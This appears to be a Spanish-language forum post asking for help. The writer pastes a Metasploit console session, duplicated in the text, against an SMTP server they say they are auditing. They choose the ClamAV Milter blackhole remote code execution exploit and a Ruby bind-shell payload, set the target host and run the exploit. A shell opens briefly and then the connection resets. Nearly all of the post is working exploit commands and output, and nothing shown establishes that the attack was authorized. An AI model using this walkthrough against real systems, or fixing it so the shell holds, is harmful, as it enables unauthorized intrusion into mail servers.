He estado haciendo una auditoria a una web y viendo los puertos abiertos localice que tenia el puerto 25 (SMTP), busque un exploit para intentar explotarlo en msf:
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
- Started bind handler
- Command shell session 1 opened (192.168.229.130:59441 -> x.x.x.x:4444) at 2014-02-15 14:44:08 -0500
daemon
[Aqui sale una codificacion extraña] - x.x.x.x - Command shell session 1 closed. Reason: Died from Errno::ECONNRESET
Creo que lo configuro todo bien pero me sigue dando este error.. He probado con diferentes payloads y con todo sucede lo mismo.
¿Alguien puede ayudarme?